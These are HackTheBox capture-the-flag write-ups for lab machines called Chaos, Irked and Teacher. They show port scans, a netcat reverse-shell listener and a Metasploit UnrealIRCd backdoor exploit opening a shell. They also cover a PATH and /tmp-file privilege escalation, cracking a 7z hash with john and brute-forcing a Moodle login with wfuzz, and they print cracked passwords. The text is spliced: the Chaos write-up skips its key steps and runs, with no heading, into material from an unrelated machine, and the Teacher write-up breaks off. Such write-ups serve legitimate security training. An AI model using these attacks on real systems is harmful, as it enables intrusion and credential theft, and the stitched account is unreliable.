Hackthebox is a website which has bunch of vulnerable machines in its own VPN.
This is a write-up of machine “Chaos” on that website.
Solution
1. Initial Enumeration
Port Scanning:
root@kali:~# nmap -p- 10.10.10.120 -sV-sC
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-05 10:19 EEST
Nmap scan report for chaos (10.10.10.120)
Host is up (0.035s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING AUTH-RESP-CODE STLS SASL CAPA UIDL TOP
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: ENABLE have more SASL-IR post-login LITERAL+ listed capabilities IDLE ID LOGIN-REFERRALS IMAP4rev1 Pre-login STARTTLS OK LOGINDISABLEDA0001
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: ENABLE have SASL-IR more LITERAL+ post-login listed IDLE ID AUTH=PLAINA0001 IMAP4rev1 capabilities Pre-login OK LOGIN-REFERRALS
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING USER AUTH-RESP-CODE SASL(PLAIN) CAPA UIDL TOP
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Not valid before: 2018-10-28T10:01:49
|_Not valid after: 2028-10-25T10:01:49
|_ssl-date: TLS randomness does not represent time
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html;Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.86 seconds
Sounds like this is a python script to encrypt given message.
We can find this code in this repository and we can find a code to decrypt the code as well.
By following command, we can decrypt the encrypted message.
root@kali:~# cat enim_msg.txt
MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08=
root@kali:~# cat enim_msg.txt | base64-d> bin.hacklab
root@kali:~# python Python-Scripts/crypto.py -d bin.hacklab -p sahay
|
|
-----+------ -----------
|
|
)(\ \ / /
\ |\ / |/
\|\ hack1lab / /
\ |\ -------- / | /
\ | \_______________________/ | /
\ | | | | | |/
\| | | | | /
\____|______|______|______|___/
By: @hacklab, @mohamed1lar
fb.me/hack1lab, fb.me/mohamed1lar
[+] Decrypting......
[+] removing file......
[+] Done
root@kali:~# cat bin
SGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK
root@kali:~# cat bin | base64-d
Hii Sahay
Please check our new service which create pdf
p.s - As you told me to encrypt important msg, i did :)
http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3
Thanks,
Ayush
Sounds like we have something interesting in address “http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3”
We have to add following line in “/etc/hosts” for name resolution.
10.10.10.120 chaos.htb
We have an interesting page to create a pdf file there.
If we see the response, we can figure out this page is using pdfTex version 3.14159265-2.6-1.40.19
At the same time, we can find a line “\write18 enabled”.
This means, we can execute shell command by having a payload and push the button “Create PDF”.
root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN)[10.10.10.120] 49920
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
However, we don’t have appropriate value in $PATH.
We have to modify the value.
ayush@chaos:~$ ls
ls
Command 'ls' is available in'/bin/ls'
The command could not be located because '/bin' is not included in the PATH environment variable.
ls: command not found
ayush@chaos:~$ echo$PATHecho$PATH
/home/ayush/.app
By export command, we can put some additional value and it enables other shell command.
“User.txt” is in the directory “/home/ayush”.
ayush@chaos:~$ export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
ayush@chaos:~$ echo$PATH
/home/ayush/.app:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
ayush@chaos:~$ ls
mail user.txt
ayush@chaos:~$ cat user.txt
eef39126d9c3b4b8a30286970dc713e1
3. Getting Root
In the home directory of ayush, we have “.mozilla” directory.
ayush@chaos:~$ ls-la
total 40
drwx------ 6 ayush ayush 4096 Jun 8 06:15 .
drwxr-xr-x 4 root root 4096 Oct 28 2018 ..
drwxr-xr-x 2 root root 4096 Oct 28 2018 .app
-rw------- 1 root root 0 Nov 24 2018 .bash_history
-rw-r--r-- 1 ayush ayush 220 Oct 28 2018 .bash_logout
-rwxr-xr-x 1 root root 22 Oct 28 2018 .bashrc
drwx------ 3 ayush ayush 4096 Jun 8 06:15 .gnupg
drwx------ 3 ayush ayush 4096 Oct 28 2018 mail
drwx------ 4 ayush ayush 4096 Sep 29 2018 .mozilla
-rw-r--r-- 1 ayush ayush 807 Oct 28 2018 .profile
-rw------- 1 ayush ayush 33 Oct 28 2018 user.txt
We can find a stored credentials for firefox in “logins.json” in following directory.
With above credential, we can login as a root user.
ayush@chaos:~$ su root
su root
Password: Thiv8wrej~
root@chaos:/home/ayush# cd
cd
root@chaos:~# cat root.txt
cat root.txt
4eca7e09e3520e020884563cfbabbc70
Since we can not use gobuster here, we have to enumerate the website manually.
In this top page, we can find links to following pages.
/info.php
/status.php
/user.php
We can find interesting information on user.php
According to this info, we can figure out we can login to this box with following credential.
10.10.14.4:10.10.14.4
root@kali:~# ssh 10.10.14.4@10.10.10.119
The authenticity of host '10.10.10.119 (10.10.10.119)' can't be established.
ECDSA key fingerprint is SHA256:FWyyew+o9WoPYkfIKGEbTMsexks1z8ZkSUs9O+2AMSU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.10.119' (ECDSA) to the list of known hosts.
10.10.14.4@10.10.10.119's password: # 10.10.14.4[10.10.14.4@lightweight ~]$
After logged in, we can find an user “10.10.14.2”.
[10.10.14.4@lightweight home]$ ls-la
total 0
drwxr-xr-x. 6 root root 76 May 17 16:25 .
dr-xr-xr-x. 17 root root 224 Jun 13 2018 ..
drwx------. 4 10.10.14.2 10.10.14.2 91 Nov 16 22:39 10.10.14.2
drwx------. 4 10.10.14.4 10.10.14.4 91 May 17 17:44 10.10.14.4
drwx------. 4 ldapuser1 ldapuser1 181 Jun 15 2018 ldapuser1
drwx------. 4 ldapuser2 ldapuser2 197 Jun 21 2018 ldapuser2
To get user.txt, we have to switch the user.
In the home directory of “10.10.14.2”, we can’t find anything. So we have to switch to “ldapuser1” or “ldapuser2”.
By using “getcap”, we can find that we can sniff the network traffic.
Since this backup file is password protected, we have to crack the password.
root@kali:~# 7z x backup.7z
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz (806EA),ASM,AES-NI)
Scanning the drive for archives:
1 file, 3411 bytes (4 KiB)
Extracting archive: backup.7z
--
Path = backup.7z
Type = 7z
Physical Size = 3411
Headers Size = 259
Method = LZMA2:12k 7zAES
Solid = +
Blocks = 1
Enter password (will not be echoed):
We can take dvantage of “7z2john.pl” installed on kali linux by default.
# install necessary module
root@kali:~# sudo apt-get install libcompress-raw-lzma-perl
# create hash for backup.7z
root@kali:/usr/share/john# ./7z2john.pl /root/backup.7z > /root/backup.7z.hash
# crack the hash with john the ripper
root@kali:~# john backup.7z.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash(7z, 7-Zip [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 12 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
delete (backup.7z)
1g 0:00:00:27 DONE (2019-05-17 21:52) 0.03595g/s 75.94p/s 75.94c/s 75.94C/s slimshady..morado
Use the "--show" option to display all of the cracked passwords reliably
Session completed
With this password “delete”, we can extract the data from backup.z7.
We can achieve some php files and we can find a credential in status.php.
We can use git-credential.
Since I’m using Kali, I can not use any authentication procedure of OS.
So I have to store my credential in local directory.
git config --global credential.helper store
We have to login with username/password one time after this command.
Then, the auth data will be stored here
Hackthebox is a website which has bunch of vulnerable machines in its own VPN.
This is a write-up of machine “Irked” on that website.
Solution
1. Initial Enumeration
Port Scanning:
root@kali:~# nmap -p- 10.10.10.117 -sV-sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-29 23:55 EET
Nmap scan report for 10.10.10.117
Host is up (0.037s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 38929/tcp status
|_ 100024 1 55964/udp status
6697/tcp open irc UnrealIRCd
8067/tcp open irc UnrealIRCd
38929/tcp open status 1 (RPC #100024)
65534/tcp open irc UnrealIRCd
Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.62 seconds
We can find a vulnerability of “UnrealIRC” on Exploit database.
root@kali:~# searchsploit unrealirc
-------------------------------------------------------------------------------------------------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)-------------------------------------------------------------------------------------------------------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit) | exploits/linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow | exploits/windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute | exploits/linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service | exploits/windows/dos/27407.pl
-------------------------------------------------------------------------------------------------------------------------------
Shellcodes: No Result
To execute the exploit, launch metasploit console.
msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor)>set rhost 10.10.10.117
rhost => 10.10.10.117
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor)>set rport 6697
rport => 6697
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor)> run
[*] Started reverse TCP double handler on 10.10.14.23:4444
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...
:irked.htb NOTICE AUTH :*** Looking up your hostname...
[*] 10.10.10.117:6697 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Uccg9OJybaPvTmSP;[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Uccg9OJybaPvTmSP\r\n"[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.23:4444 -> 10.10.10.117:51673) at 2019-04-14 17:49:40 +0300
id
uid=1001(ircd)gid=1001(ircd)groups=1001(ircd)
In directory “/home/djmardov/Documents”, we can find user.txt and interesting file “.backup”.
Since we’re not use djmardov, we don’t have a permission to read user.txt
pwd
/home/djmardov/Documents
ls-la
total 16
drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 04:40 ..
-rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup
-rw------- 1 djmardov djmardov 33 May 15 2018 user.txt
Sounds the content of .backup is password for “steganography”
cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss
On the top page of port 80, we can find a image file “irked.jpg”
We can use this website to decode the data of irked.jpg.
The data achieved is “Kab6h+m+bbp2J:HG”.
djmardov:Kab6h+m+bbp2J:HG
We can take advantage of the credential above for ssh connection.
root@kali:~# ssh djmardov@10.10.10.117
djmardov@10.10.10.117's password:
~~~
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3
djmardov@irked:~$
unlike other boxes, user.txt in in a directory “Documents”.
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-04-11 15:02 (:0)
djmardov pts/0 2019-04-14 11:05 (10.10.14.23)
sh: 1: /tmp/listusers: not found
Sounds like we need an input for “viewuser” and shell tries to execute it.
Then put a command to “/tmp/listusers”. We can confirm it is executed.
djmardov@irked:~$ echo /bin/bash > /tmp/listusers
djmardov@irked:~$ chmod 777 /tmp/listusers
djmardov@irked:~$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0 2019-04-23 17:05 (:0)
djmardov pts/0 2019-04-27 15:35 (10.10.14.23)
root@irked:~#
Hackthebox is a website which has bunch of vulnerable machines in its own VPN.
This is a write-up of machine “Teacher” on that website.
Solution
1. Initial Enumeration
Port Scanning:
root@kali:# nmap -p- 10.10.10.153 -sV-sC
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-15 23:12 EET
Nmap scan report for 10.10.10.153
Host is up (0.035s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blackhat highschool
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.90 seconds
As we can see, Moodule is running on this server.
We can login the moodle as guest user but there is not any interesting information.
By enumerating some other pages, we can find that there is a strange image file on “/gallery.html”
What we can find is that
There is a image tag its source file is exist but we can not see
This tag shows unknown message which says “That’s an F”
By executing curl command, we can figure out what is the content of 5.png
root@kali:~# curl http://10.10.10.153/images/5.png
Hi Servicedesk,
I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha.
Could you guys figure out what the last charachter is, or just reset it?
Thanks,
Giovanni
According to this information, the username we can expect is “Giovanni”.
And its password consists of “Th4C00lTheacha” + one character.
We can take advantage of this information for login to moodle admin console.
At first, we have to create a possible password lists.
By running a script above, we have possible passwords.
Then, try to execute dictionary attack.
We can use “wfuzz” for this purpose.
root@kali:~# wfuzz -w ./password.txt --hh 440 -t 20 -d"anchor=&username=giovanni&password=FUZZ" http://10.10.10.153/moodle/login/index.php
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.153/moodle/login/index.php
Total requests: 94
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000065: C=303 6 L 34 W 454 Ch "Th4C00lTheacha#"
Total time: 11.37637
Processed Requests: 94
Filtered Requests: 93
Requests/sec.: 8.262736
This means we got this credential for moodle.
giovanni:Th4C00lTheacha#
Then click on Algebra, setting button, and “More…”
Click “questions” and “create a new question”.
Then, click “Caluculated” and “add”.
Put following values, save the change and click “next page”.
Clack this hash with John the Ripper. The password is “expelled”.
We can use this credential “giovanni:expelled” for su command
As usuall, user.txt is in a home directory.
www-data@teacher:/var/www/html/moodle$ su giovanni
su giovanni
Password: expelled
giovanni@teacher:/var/www/html/moodle$ cd
cd
giovanni@teacher:~$ cat user.txt
cat user.txt
fa9ae187462530e841d9e61936648fa7
3. Getting Root
if we execute following command, we can assume automatic process is running and giving some modification for this directory by its date.
giovanni@teacher:~/work$ ls-lals-la
total 16
drwxr-xr-x 4 giovanni giovanni 4096 Apr 26 21:28 .
drwxr-x--- 4 giovanni giovanni 4096 Nov 4 19:47 ..
drwxrwxrwx 3 giovanni giovanni 4096 Apr 26 21:28 courses
drwxrwxrwx 3 giovanni giovanni 4096 Jun 27 2018 tmp
At the same time, we can find an interesting binary in “/usr/bin”.